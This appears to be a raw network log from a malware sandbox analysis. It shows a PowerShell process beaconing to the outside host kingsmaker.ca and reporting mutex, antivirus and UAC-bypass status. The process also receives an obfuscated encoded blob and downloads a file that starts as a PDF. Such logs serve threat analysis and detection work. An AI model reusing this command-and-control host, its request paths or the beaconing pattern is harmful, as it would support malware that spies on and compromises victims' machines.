                                                                                                            2024-11-29 08:09:03 UTC259INData Raw: 25 60 6c 6a 70 7b 78 3c 5a 52 78 72 75 64 6c 2f 55 64 79 75 2f 44 6f 62 6e 65 68 6f 66 5c 3b 3b 40 52 42 48 48 2f 46 64 75 52 75 73 68 6f 66 29 5a 52 78 72 75 64 6c 2f 42 6e 6f 77 64 73 75 5c 3b 3b 47 73 6e 6c 43 60 72 64 37 35 52 75 73 68 6f 66 29 23 60 6c 53 49 63 49 5b 68 60 54 4b 45 54 30 57 56 50 30 65 73 62 44 65 57 4c 54 71 4b 53 47 47 76 4f 31 53 53 63 33 65 4b 50 31 47 6f 52 6a 65 6e 63 47 6d 59 54 6c 79 6b 63 6a 30 6f 54 47 4f 42 50 56 54 7b 4c 45 65 44 54 56 38 6f 52 54 4f 43 5b 31 71 49 65 46 79 6d 54 31 44 34 52 54 4f 4a 53 46 48 78 4f 55 43 60 57 7b 54 76 55 47 5b 52 4f 56 4f 49 57 56 6d 51 65 7b 43 4d 52 54 4f 43 5b 31 6d 45 54 6b 4b 5b 57 32 66 79 56 6d 4f 43 4e 54 6d 45 52 6c 69 6b 52 44 4b 7b 58 57 65 4e 60 46 53 49 63 49 5b 68 60 55 6d
                                                                                                            Data Ascii: %`ljp{x<ZRxrudl/Udyu/Dobnehof\;;@RBHH/FduRushof)ZRxrudl/Bnowdsu\;;GsnlC`rd75Rushof)#`lSIcI[h`TKET0WVP0esbDeWLTqKSGGvO1SSc3eKP1GoRjencGmYTlykcj0oTGOBPVT{LEeDTV8oRTOC[1qIeFymT1D4RTOJSFHxOUC`W{TvUG[ROVOIWVmQe{CMRTOC[1mETkK[W2fyVmOCNTmERlikRDK{XWeN`FSIcI[h`Um
                                                                                                            2024-11-29 08:09:03 UTC1369INData Raw: 34 65 54 6d 70 62 31 34 45 5b 7b 43 4d 52 54 4f 43 5b 31 6d 45 54 6c 38 60 57 31 5b 73 56 6d 69 4a 64 6d 65 34 54 6f 4b 60 56 46 79 6a 52 54 50 76 5b 31 71 48 56 6c 69 68 52 47 5b 72 55 32 62 76 52 31 6d 45 50 56 65 4b 50 30 48 79 58 33 30 73 5b 30 43 55 50 56 6d 69 52 47 48 76 58 31 69 4f 4f 6a 79 34 4e 59 4b 69 57 7b 57 74 58 7b 48 79 60 46 44 78 57 6f 6d 4c 63 54 34 6e 55 49 71 52 60 6d 6d 75 54 55 4b 4f 64 6c 53 6e 55 57 53 6e 60 6d 6d 54 58 7b 4f 4f 53 46 69 72 55 31 53 4f 64 47 6d 59 53 59 65 51 53 31 5b 71 55 57 53 42 60 44 30 54 54 59 65 60 57 47 47 32 55 55 4b 57 4c 6d 71 75 53 6c 75 4e 57 44 44 79 55 6d 53 73 4c 6d 71 54 57 59 6d 4f 63 54 71 73 55 6a 53 5b 4c 47 6d 54 57 55 57 5b 60 6d 4b 71 55 6c 71 60 60 6a 30 44 56 59 65 60 57 30 6a 79 56 57
                                                                                                            Data Ascii: 4eTmpb14E[{CMRTOC[1mETl8`W1[sVmiJdme4ToK`VFyjRTPv[1qHVlihRG[rU2bvR1mEPVeKP0HyX30s[0CUPVmiRGHvX1iOOjy4NYKiW{WtX{Hy`FDxWomLcT4nUIqR`mmuTUKOdlSnUWSn`mmTX{OOSFirU1SOdGmYSYeQS1[qUWSB`D0TTYe`WGG2UUKWLmquSluNWDDyUmSsLmqTWYmOcTqsUjS[LGmTWUW[`mKqUlq``j0DVYe`W0jyVW
                                                                                                            2024-11-29 08:09:03 UTC1369INData Raw: 4c 47 71 60 57 6d 57 4a 56 57 47 57 56 6a 65 4c 63 59 69 72 58 6c 30 6a 4c 46 47 45 50 59 53 60 4c 30 47 6f 55 57 4f 73 55 6a 4f 71 50 56 65 4b 50 31 48 32 53 47 47 77 5b 31 6d 45 50 56 65 4b 50 31 47 6f 5b 45 4f 4a 62 46 53 49 57 59 53 69 53 7b 6d 37 5b 44 4f 43 60 56 4c 78 57 6f 57 60 50 31 4b 7b 58 6b 4b 6b 60 54 38 32 4c 44 75 4b 50 31 47 6f 52 54 4f 43 5b 31 6d 47 52 6a 71 52 57 54 71 69 54 33 75 60 57 47 57 73 5b 7b 65 44 54 56 38 6f 52 54 4f 43 5b 31 6d 45 50 56 65 6a 4c 31 71 76 5b 44 65 57 65 46 47 49 4e 59 71 6a 50 31 47 71 56 55 4b 35 63 47 6d 58 52 56 65 68 53 7b 6d 74 52 56 71 7b 55 6a 4f 71 50 56 65 4b 50 31 47 6f 52 54 4f 43 60 30 6e 78 64 49 5b 5b 63 54 5b 7b 55 33 75 6a 54 47 4b 72 63 47 5b 53 63 46 69 42 54 6c 75 5b 5b 30 43 55 50 6a 47
                                                                                                            Data Ascii: LGq`WmWJVWGWVjeLcYirXl0jLFGEPYS`L0GoUWOsUjOqPVeKP1H2SGGw[1mEPVeKP1Go[EOJbFSIWYSiS{m7[DOC`VLxWoW`P1K{XkKk`T82LDuKP1GoRTOC[1mGRjqRWTqiT3u`WGWs[{eDTV8oRTOC[1mEPVejL1qv[DeWeFGINYqjP1GqVUK5cGmXRVehS{mtRVq{UjOqPVeKP1GoRTOC`0nxdI[[cT[{U3ujTGKrcG[ScFiBTlu[[0CUPjG
                                                                                                            2024-11-29 08:09:03 UTC1369INData Raw: 31 53 53 63 33 65 4b 50 31 47 6f 57 6b 43 35 54 6d 65 57 63 47 4b 55 60 32 43 51 57 6f 6d 43 60 57 47 75 57 6c 34 69 57 7b 53 6f 54 6a 62 34 4c 33 4b 75 64 49 5b 5b 57 30 47 6f 52 6a 65 60 62 46 4b 49 57 6d 47 5b 56 47 4b 77 52 56 71 7b 55 6a 4f 71 50 56 65 4b 50 31 47 70 52 54 57 4e 63 30 71 59 55 6f 4b 4b 53 33 79 75 52 54 69 52 63 30 71 55 50 6c 30 69 57 32 69 72 52 54 65 56 4f 46 47 58 55 6b 43 6b 65 7b 43 4d 52 54 4f 43 5b 31 6d 49 63 46 30 4b 50 33 65 31 58 6c 31 34 4c 44 6d 45 60 47 57 60 56 44 35 76 55 47 5b 42 60 46 53 49 5b 33 65 4c 57 6a 4b 6e 5b 44 65 6f 5b 31 71 49 56 6f 43 68 53 30 5b 53 56 57 69 52 63 31 75 55 60 33 65 6d 65 7b 43 4d 52 54 4f 43 5b 31 6d 45 50 56 65 4b 50 31 4b 58 57 44 5b 46 56 6d 4f 56 53 6a 75 55 60 7b 57 58 52 54 4f 4a
                                                                                                            Data Ascii: 1SSc3eKP1GoWkC5TmeWcGKU`2CQWomC`WGuWl4iW{SoTjb4L3KudI[[W0GoRje`bFKIWmG[VGKwRVq{UjOqPVeKP1GpRTWNc0qYUoKKS3yuRTiRc0qUPl0iW2irRTeVOFGXUkCke{CMRTOC[1mIcF0KP3e1Xl14LDmE`GW`VD5vUG[B`FSI[3eLWjKn[Deo[1qIVoChS0[SVWiRc1uU`3eme{CMRTOC[1mEPVeKP1KXWD[FVmOVSjuU`{WXRTOJ
                                                                                                            2024-11-29 08:09:03 UTC1369INData Raw: 71 33 58 6d 5b 56 64 56 4b 45 50 6b 65 44 54 56 38 6f 52 54 4f 43 5b 33 4f 49 53 6f 6d 5b 57 7b 43 6f 52 31 44 76 52 31 6d 45 50 56 65 4b 50 31 47 6f 52 54 4f 42 58 6c 4c 7b 54 6f 6d 69 57 7b 57 74 56 47 4f 52 57 6c 4f 75 65 32 4f 44 54 56 38 6f 52 54 4f 43 5b 31 6d 45 50 56 65 4b 53 6f 53 37 5b 44 69 4a 62 46 4b 75 5b 46 53 4a 53 57 4b 72 58 7b 4f 52 62 46 4b 75 53 6b 43 69 57 7b 6d 30 53 47 47 77 5b 31 6d 45 50 56 65 4d 54 55 43 4d 53 47 47 77 5b 31 6d 45 50 56 65 4a 53 31 34 33 5b 47 62 30 4c 44 6d 44 4c 46 65 4f 57 44 44 32 53 47 47 77 5b 31 6d 45 50 56 65 6a 4c 6c 69 76 58 6a 65 57 63 31 71 49 55 6f 5b 6a 57 7b 54 76 52 54 4c 79 63 6c 53 45 50 59 65 4d 54 55 43 4d 52 54 4f 43 5b 31 6d 48 62 31 34 45 60 54 47 6f 52 54 4f 43 5b 31 6d 45 50 56 65 6a 52
                                                                                                            Data Ascii: q3Xm[VdVKEPkeDTV8oRTOC[3OISom[W{CoR1DvR1mEPVeKP1GoRTOBXlL{TomiW{WtVGORWlOue2ODTV8oRTOC[1mEPVeKSoS7[DiJbFKu[FSJSWKrX{ORbFKuSkCiW{m0SGGw[1mEPVeMTUCMSGGw[1mEPVeJS143[Gb0LDmDLFeOWDD2SGGw[1mEPVejLlivXjeWc1qIUo[jW{TvRTLyclSEPYeMTUCMRTOC[1mHb14E`TGoRTOC[1mEPVejR
                                                                                                            2024-11-29 08:09:03 UTC1369INData Raw: 71 50 56 65 4b 50 31 47 6f 52 54 4f 43 5b 31 6d 34 50 6d 4f 60 57 31 5b 73 52 54 69 52 63 30 71 55 50 6c 30 69 57 32 69 72 52 54 65 72 65 56 53 49 4e 46 65 5b 54 31 4b 71 5b 57 69 52 63 44 6d 49 53 6f 6d 6b 63 54 58 30 53 47 47 77 5b 31 6d 45 50 56 65 4b 50 31 47 6f 52 54 4f 52 63 56 47 59 64 46 79 53 63 6c 76 76 56 6d 69 4f 5b 30 43 55 50 6c 4b 57 4c 33 79 37 5b 44 65 56 65 44 79 73 63 47 43 4c 60 30 71 76 58 6a 65 56 5b 44 38 70 62 47 4f 60 57 31 5b 73 54 57 65 35 62 30 47 74 63 45 43 60 56 44 30 77 52 6a 57 72 65 56 4f 48 57 6b 43 52 63 56 79 7b 56 6d 5b 42 60 46 53 49 5b 32 43 44 54 56 38 4e 50 33 6d 43 5b 31 6d 45 50 56 65 4b 50 31 47 6f 52 59 6d 42 50 6c 4f 48 50 6f 4f 6d 54 31 4b 5b 57 45 47 4b 5b 30 71 59 4f 56 71 6b 63 6c 79 32 5b 44 65 72 65 6c
                                                                                                            Data Ascii: qPVeKP1GoRTOC[1m4PmO`W1[sRTiRc0qUPl0iW2irRTereVSINFe[T1Kq[WiRcDmISomkcTX0SGGw[1mEPVeKP1GoRTORcVGYdFySclvvVmiO[0CUPlKWL3y7[DeVeDyscGCL`0qvXjeV[D8pbGO`W1[sTWe5b0GtcEC`VD0wRjWreVOHWkCRcVy{Vm[B`FSI[2CDTV8NP3mC[1mEPVeKP1GoRYmBPlOHPoOmT1K[WEGK[0qYOVqkcly2[Derel
                                                                                                            2024-11-29 08:09:03 UTC1369INData Raw: 58 6c 34 52 5b 44 71 46 54 6f 43 68 57 30 5b 33 5b 47 69 52 57 47 71 59 55 6f 5b 68 63 57 4b 37 52 54 50 76 5b 31 34 70 50 56 65 4b 50 31 47 6f 52 54 4f 43 5b 31 6d 45 50 56 65 4b 50 31 47 6f 53 47 47 77 5b 31 6d 45 50 56 65 4d 54 55 43 4d 53 47 47 77 55 6a 4f 71 50 56 65 4b 50 31 47 73 5b 44 65 56 65 46 4f 47 56 6f 5b 68 53 30 4b 72 58 33 6d 43 4e 54 6d 46 65 47 53 6d 56 44 35 76 56 6d 62 76 65 57 4f 57 4e 49 57 57 53 31 58 76 58 54 58 76 4f 6a 38 73 5b 46 79 6a 53 6d 4b 72 58 6d 69 42 54 57 6d 58 54 6c 38 4d 50 33 75 4e 50 33 62 76 52 31 53 53 63 33 65 4b 50 31 47 6f 52 6a 65 60 62 46 4b 49 57 6d 47 5b 56 47 4b 77 52 54 50 76 5b 30 4f 75 4e 59 43 68 60 55 47 53 56 57 69 52 63 31 6d 45 4c 57 47 5b 56 47 4b 77 52 54 4f 52 4c 47 71 59 4c 59 65 52 63 55 6d
                                                                                                            Data Ascii: Xl4R[DqFToChW0[3[GiRWGqYUo[hcWK7RTPv[14pPVeKP1GoRTOC[1mEPVeKP1GoSGGw[1mEPVeMTUCMSGGwUjOqPVeKP1Gs[DeVeFOGVo[hS0KrX3mCNTmFeGSmVD5vVmbveWOWNIWWS1XvXTXvOj8s[FyjSmKrXmiBTWmXTl8MP3uNP3bvR1SSc3eKP1GoRje`bFKIWmG[VGKwRTPv[0OuNYCh`UGSVWiRc1mELWG[VGKwRTORLGqYLYeRcUm
                                                                                                            2024-11-29 08:09:03 UTC1369INData Raw: 47 4b 55 60 32 43 51 57 6f 6d 43 60 57 4b 75 63 49 4f 60 54 31 4b 72 5b 54 65 72 64 6c 53 48 55 55 5b 4b 50 30 4b 75 58 57 65 35 63 47 57 49 53 6b 43 69 50 31 6d 4e 50 33 62 76 52 31 6d 45 50 56 65 4b 50 31 47 6f 52 54 4f 43 5b 31 6d 45 50 56 65 4b 64 54 4b 47 56 6d 65 35 63 46 53 49 57 56 65 6a 53 33 69 72 52 54 65 60 62 46 4b 49 57 54 34 45 60 54 47 6f 52 54 4f 43 5b 31 6d 45 50 56 65 4b 50 31 47 6f 52 54 5b 4a 63 46 4b 59 4e 55 4b 60 54 7b 47 4a 5b 44 65 56 65 44 6d 45 4c 57 47 5b 56 47 4b 77 52 54 4f 52 63 56 47 59 64 46 79 57 53 31 58 76 58 54 4f 43 65 47 4b 75 4e 59 6d 5b 4c 6d 57 4e 50 33 6d 43 5b 31 6d 45 50 56 65 4b 50 31 47 6f 52 54 4f 43 5b 31 6d 46 5b 44 30 57 57 6c 79 4a 57 57 57 76 52 30 53 72 58 33 65 4b 60 30 71 76 58 6a 65 57 5b 30 71 49
                                                                                                            Data Ascii: GKU`2CQWomC`WKucIO`T1Kr[TerdlSHUU[KP0KuXWe5cGWISkCiP1mNP3bvR1mEPVeKP1GoRTOC[1mEPVeKdTKGVme5cFSIWVejS3irRTe`bFKIWT4E`TGoRTOC[1mEPVeKP1GoRT[JcFKYNUK`T{GJ[DeVeDmELWG[VGKwRTORcVGYdFyWS1XvXTOCeGKuNYm[LmWNP3mC[1mEPVeKP1GoRTOC[1mF[D0WWlyJWWWvR0SrX3eK`0qvXjeW[0qI
                                                                                                            2024-11-29 08:09:03 UTC1369INData Raw: 69 6f 5b 33 47 58 55 56 65 68 63 55 6a 76 52 54 65 35 65 6d 6a 78 65 46 79 60 50 31 6a 32 53 47 47 77 5b 31 6d 45 50 56 65 4a 53 31 5b 30 5b 44 65 72 4c 6c 47 58 52 6b 47 6a 50 31 44 34 52 54 57 6a 63 46 53 45 4c 57 69 68 57 33 79 50 56 56 30 76 63 47 6a 7b 54 56 65 4c 57 55 57 6e 58 6d 65 56 64 6c 4f 49 53 6c 71 60 54 31 47 71 58 33 31 34 65 6c 53 46 64 47 53 60 57 31 35 79 58 33 30 72 4c 46 57 57 55 6c 79 68 63 6d 4b 72 58 33 71 4b 60 54 6d 45 4c 57 4b 6a 57 30 5b 34 5b 57 4f 43 60 57 54 76 57 6a 30 52 57 54 34 57 52 54 4f 77 5b 30 4b 72 52 6d 43 54 54 31 4b 42 58 6c 34 52 62 46 53 75 63 49 6d 6a 56 44 34 53 58 33 31 34 60 33 53 59 55 6b 43 4b 5b 7b 43 4d 52 54 4f 43 5b 31 6d 46 5b 44 30 57 57 6c 79 4a 57 57 57 76 52 30 53 72 58 33 65 4b 60 31 5b 59 52
                                                                                                            Data Ascii: io[3GXUVehcUjvRTe5emjxeFy`P1j2SGGw[1mEPVeJS1[0[DerLlGXRkGjP1D4RTWjcFSELWihW3yPVV0vcGj{TVeLWUWnXmeVdlOISlq`T1GqX314elSFdGS`W15yX30rLFWWUlyhcmKrX3qK`TmELWKjW0[4[WOC`WTvWj0RWT4WRTOw[0KrRmCTT1KBXl4RbFSucImjVD4SX314`3SYUkCK[{CMRTOC[1mF[D0WWlyJWWWvR0SrX3eK`1[YR
                                                                                                            2024-11-29 08:09:03 UTC1369INData Raw: 53 57 54 6d 35 54 57 57 6e 52 6d 47 59 53 6d 4b 53 57 33 53 42 54 6a 53 42 50 6d 4f 57 53 6a 4b 69 57 54 5b 48 56 6b 43 46 60 30 47 57 52 59 65 53 57 56 69 42 54 57 65 4e 4c 30 47 54 56 6a 4b 53 64 6c 69 42 57 44 69 6a 50 33 4f 73 53 6a 69 69 4c 44 5b 71 56 6b 43 4a 65 57 47 57 60 44 34 53 57 31 71 52 54 56 30 6e 50 6d 48 7b 55 6a 4b 59 63 44 5b 45 5b 57 57 46 53 44 34 47 53 6d 71 6a 4c 44 71 77 54 57 57 4f 4f 47 47 56 62 46 34 53 63 6a 4b 42 54 6b 4f 6a 50 6d 65 72 53 6a 4b 6d 57 54 5b 44 55 31 57 46 54 47 57 57 52 6c 38 53 57 56 53 56 54 57 5b 72 54 6d 47 54 54 6a 4b 52 4c 46 79 42 57 33 30 6a 50 6a 34 47 53 6a 57 54 57 54 5b 4e 5b 45 43 4a 62 57 47 57 54 6c 34 53 57 55 54 7b 54 57 53 4e 50 6d 4b 47 53 6a 4b 54 4c 54 5b 42 55 57 57 46 53 56 44 76 53 6c
                                                                                                            Data Ascii: SWTm5TWWnRmGYSmKSW3SBTjSBPmOWSjKiWT[HVkCF`0GWRYeSWViBTWeNL0GTVjKSdliBWDijP3OsSjiiLD[qVkCJeWGW`D4SW1qRTV0nPmH{UjKYcD[E[WWFSD4GSmqjLDqwTWWOOGGVbF4ScjKBTkOjPmerSjKmWT[DU1WFTGWWRl8SWVSVTW[rTmGTTjKRLFyBW30jPj4GSjWTWT[N[ECJbWGWTl4SWUT{TWSNPmKGSjKTLT[BUWWFSVDvSl


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            5192.168.11.3049740172.67.179.674433620C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2024-11-29 08:09:04 UTC283OUTPOST /4cbd637a18ca7708e831aa08ab10a140e403e6fad505596e522bd464a59b4b66c060ef5a4b60433d181b4c53f36668ff HTTP/1.1
                                                                                                            Content-Type: application/json
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151
                                                                                                            Host: kingsmaker.ca
                                                                                                            Content-Length: 85
                                                                                                            2024-11-29 08:09:04 UTC85OUTData Raw: 5b 0d 0a 20 20 20 20 22 5c 22 4a 6f 62 20 69 73 20 72 75 6e 6e 69 6e 67 2e 20 4a 6f 62 20 49 44 3a 20 31 5c 22 22 2c 0d 0a 20 20 20 20 22 5c 22 43 68 65 63 6b 20 6d 75 74 65 78 74 5c 22 22 2c 0d 0a 20 20 20 20 22 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 22 0d 0a 5d
                                                                                                            Data Ascii: [ "\"Job is running. Job ID: 1\"", "\"Check mutext\"", "----------"]
                                                                                                            2024-11-29 08:09:05 UTC982INHTTP/1.1 200 OK
                                                                                                            Date: Fri, 29 Nov 2024 08:09:05 GMT
                                                                                                            Content-Length: 0
                                                                                                            Connection: close
                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Msb2ShuWT4XXmCW9Rqe%2FFjX2%2BlVRn3t40izBDp06Gq4MeVLeKtQK%2BYzt7Lbdx8ZG7Tkyd7KvXDpdajK5z3KTumXlvcuEtqYsAt%2Bh5Vg%2FwUPv67RKA%2BHMKI1Gc94CrJCe3vTtINsrh%2B0d"}],"group":"cf-nel","max_age":604800}
                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1180&min_rtt=1180&rtt_var=590&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=870&delivery_rate=0&cwnd=227&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                            X-Powered-By: ARR/3.0
                                                                                                            Server: cloudflare
                                                                                                            CF-RAY: 8ea11d0d18c1a982-LAS
                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=158944&min_rtt=158834&rtt_var=33675&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2832&recv_bytes=1028&delivery_rate=24063&cwnd=252&unsent_bytes=0&cid=f9b2e9ad3d9dd240&ts=737&x=0"


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            6192.168.11.3049741172.67.179.674433620C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2024-11-29 08:09:05 UTC283OUTPOST /4cbd637a18ca7708e831aa08ab10a140e403e6fad505596e522bd464a59b4b66c060ef5a4b60433d181b4c53f36668ff HTTP/1.1
                                                                                                            Content-Type: application/json
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151
                                                                                                            Host: kingsmaker.ca
                                                                                                            Content-Length: 86
                                                                                                            2024-11-29 08:09:05 UTC86OUTData Raw: 5b 0d 0a 20 20 20 20 22 5c 22 4d 75 74 65 78 20 69 73 20 6e 6f 74 20 6c 6f 63 6b 65 64 5c 22 22 2c 0d 0a 20 20 20 20 22 5c 22 41 56 20 57 69 6e 64 6f 77 73 20 44 65 66 65 6e 64 65 72 5c 22 22 2c 0d 0a 20 20 20 20 22 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 22 0d 0a 5d
                                                                                                            Data Ascii: [ "\"Mutex is not locked\"", "\"AV Windows Defender\"", "----------"]
                                                                                                            2024-11-29 08:09:06 UTC983INHTTP/1.1 200 OK
                                                                                                            Date: Fri, 29 Nov 2024 08:09:06 GMT
                                                                                                            Content-Length: 0
                                                                                                            Connection: close
                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3oBOYiEBblY2eQVYdQM4BF7q3t9wgvYblZ3uCWhIPnE3B1G%2FSoiEQ8aXQcJDbCAFGqwoSfFXZjyWxk2H9AuuVm392k3V36XZhv4cpbRMmf%2FQWQU0IGJlK%2B8PQc9safkZybjYGhzz78na"}],"group":"cf-nel","max_age":604800}
                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=8972&min_rtt=1180&rtt_var=16027&sent=5&recv=7&lost=0&retrans=0&sent_bytes=760&recv_bytes=1741&delivery_rate=22984&cwnd=228&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                            X-Powered-By: ARR/3.0
                                                                                                            Server: cloudflare
                                                                                                            CF-RAY: 8ea11d141a510a01-LAS
                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=159151&min_rtt=159040&rtt_var=33719&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2832&recv_bytes=1029&delivery_rate=24034&cwnd=252&unsent_bytes=0&cid=6b6238ec05999f20&ts=686&x=0"


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            7192.168.11.3049742172.67.179.674433620C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2024-11-29 08:09:06 UTC283OUTPOST /4cbd637a18ca7708e831aa08ab10a140e403e6fad505596e522bd464a59b4b66c060ef5a4b60433d181b4c53f36668ff HTTP/1.1
                                                                                                            Content-Type: application/json
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151
                                                                                                            Host: kingsmaker.ca
                                                                                                            Content-Length: 62
                                                                                                            2024-11-29 08:09:06 UTC62OUTData Raw: 5b 0d 0a 20 20 20 20 22 30 22 2c 0d 0a 20 20 20 20 22 5c 22 6b 6f 20 63 61 6e 20 62 79 70 61 73 73 20 75 61 63 5c 22 22 2c 0d 0a 20 20 20 20 22 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 22 0d 0a 5d
                                                                                                            Data Ascii: [ "0", "\"ko can bypass uac\"", "----------"]
                                                                                                            2024-11-29 08:09:07 UTC995INHTTP/1.1 200 OK
                                                                                                            Date: Fri, 29 Nov 2024 08:09:07 GMT
                                                                                                            Content-Length: 0
                                                                                                            Connection: close
                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ain8WcSWUbEqDeyuE2saGIF4HzxxwlTO49kaYHxuvTMx3H3QRN7XIV8cRLG4PV0EB4PcUKkMw%2B48Yei5%2BRSOwJgZCtM%2Fu56f%2F6qNtLWXtc%2B1gMMHiiUKhSTDqNKFMHfxkLLagz6ZSaE4"}],"group":"cf-nel","max_age":604800}
                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=15166&min_rtt=1293&rtt_var=22482&sent=27&recv=24&lost=0&retrans=0&sent_bytes=24879&recv_bytes=5015&delivery_rate=12835164&cwnd=255&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                            X-Powered-By: ARR/3.0
                                                                                                            Server: cloudflare
                                                                                                            CF-RAY: 8ea11d1ab92fa982-LAS
                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=158763&min_rtt=158662&rtt_var=33628&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2832&recv_bytes=1005&delivery_rate=24092&cwnd=252&unsent_bytes=0&cid=5dc7bf0be91ba35c&ts=664&x=0"


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            8192.168.11.3049743172.67.179.674437896C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2024-11-29 08:09:06 UTC388OUTGET /file2/49508e4a94e55731c13cdad92122b7aa2ebdf21d51630b7cdcc73837245a4bab7339db115da9503bff5f3eb63dd5c8b58a4edbb94e89e961ebecca194b9e0e9e7656d46736c256bfc8b3dc86635484638b966bdfe9f1621daa6f792b5a53044675d929c45f5b8ee476604bf020ab6dd8 HTTP/1.1
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151
                                                                                                            Host: kingsmaker.ca
                                                                                                            Connection: Keep-Alive
                                                                                                            2024-11-29 08:09:07 UTC1107INHTTP/1.1 200 OK
                                                                                                            Date: Fri, 29 Nov 2024 08:09:07 GMT
                                                                                                            Content-Type: application/octet-stream
                                                                                                            Content-Length: 697614
                                                                                                            Connection: close
                                                                                                            content-disposition: attachment; filename=file; filename*=UTF-8''file
                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ngXHMbtPXSMJyHT%2BadM9ubyXAuvO%2BUndmwQTchC%2BJpVZYovYZTKTsO0RUgyRAW8ax1QcUlU%2Bp98ZKaV4Hvtm6olf%2BQR96C%2FQUzWwgL0bO7yYdPqAvyRhOirAlDbFPMc6ABAz3lNsPv24"}],"group":"cf-nel","max_age":604800}
                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=17322&min_rtt=1180&rtt_var=28721&sent=7&recv=9&lost=0&retrans=0&sent_bytes=1521&recv_bytes=2741&delivery_rate=22984&cwnd=229&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                            X-Powered-By: ARR/3.0
                                                                                                            Server: cloudflare
                                                                                                            CF-RAY: 8ea11d1b7fd409ff-LAS
                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=158787&min_rtt=158670&rtt_var=33653&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2832&recv_bytes=1002&delivery_rate=24082&cwnd=252&unsent_bytes=0&cid=3e782ad2ff29e765&ts=714&x=0"
                                                                                                            2024-11-29 08:09:07 UTC262INData Raw: 25 50 44 46 2d 31 2e 34 0a 25 e2 e3 cf d3 0a 31 32 20 30 20 6f 62 6a 0a 3c 3c 0a 2f 53 75 62 74 79 70 65 20 2f 49 6d 61 67 65 0a 2f 57 69 64 74 68 20 31 32 34 31 0a 2f 48 65 69 67 68 74 20 31 37 35 34 0a 2f 43 6f 6c 6f 72 53 70 61 63 65 20 2f 44 65 76 69 63 65 52 47 42 0a 2f 42 69 74 73 50 65 72 43 6f 6d 70 6f 6e 65 6e 74 20 38 0a 2f 46 69 6c 74 65 72 20 5b 2f 46 6c 61 74 65 44 65 63 6f 64 65 20 2f 44 43 54 44 65 63 6f 64 65 5d 0a 2f 44 65 63 6f 64 65 50 61 72 6d 73 20 5b 6e 75 6c 6c 20 3c 3c 0a 2f 51 75 61 6c 69 74 79 20 36 30 0a 3e 3e 5d 0a 2f 4c 65 6e 67 74 68 20 31 36 37 35 32 32 0a 3e 3e 0a 73 74 72 65 61 6d 0a 78 9c ec bd 05 58 1c db b6 2e 5a 04 4b 20 40 d0 10 34 01 82 4b b0 40 b0 86 10 3c b8 34 4e 82 bb bb 35 81 00 a1 71 08 10 20 48 70 27 10 dc 83
                                                                                                            Data Ascii: %PDF-1.4%12 0 obj<</Subtype /Image/Width 1241/Height 1754/ColorSpace /DeviceRGB/BitsPerComponent 8/Filter [/FlateDecode /DCTDecode]/DecodeParms [null <</Quality 60>>]/Length 167522>>streamxX.ZK @4K@<4N5q Hp'
